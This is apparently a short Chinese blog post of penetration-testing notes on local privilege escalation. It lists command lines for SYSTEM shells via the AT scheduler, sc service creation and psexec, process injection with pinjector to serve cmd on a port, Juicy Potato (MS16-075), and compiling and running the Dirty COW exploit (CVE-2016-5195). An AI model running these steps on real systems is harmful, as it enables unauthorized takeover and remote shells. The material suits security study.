本地提權

白果香草發表於2020-10-17

本地提權

方法一:AT命令提權

條件:(1)適應範圍(win3->win8) (2)必須在administrats組

at 18:41 /interactive cmd

taskmgr //開啟一個程式

殺死當前explorer.exe桌面程式,再開啟就是system

方法二:建立服務提權

建立一個服務

sc Create syscmd binPath= “cmd /K start” type= own type= interact

sc start syscmd

方法三:核心提權

psexec -i -s -d cmd

pinjector.exe -p 2152 cmd 12345

方法四:程式注入

優點:隱藏程式

pinjector.exe -l //列出當前可被注入的程式

pinjector -p PID cmd 埠 //注入指定程式將cmd反彈給連線該埠

漏洞提權

爛土豆提權 ---------軟體在/工具/提權/爛土豆

MS16-075漏洞

原理:令牌提權

步驟:

Juicypotato.exe -p whoami

髒牛提權(linux)

(CVE-2016-5195)核心提權漏洞分析

原理:Linux核心的記憶體子系統在處理寫時拷貝(Copy-on-Write)時存在條件競爭漏洞,導致可以破壞私有隻讀記憶體對映。

影響範圍:Linux核心>=2.6.22(2007年發行)開始就受影響了,直到2016年10月18日才修復。

實驗工具 gcc:linux系統下的編譯器,用於編譯程式

dirtyc.c:本次實驗漏洞驗證的POC原始碼

步驟:

gcc -pthread dirty.c -o dirty -lcrypt //編譯

./dirty password

相關文章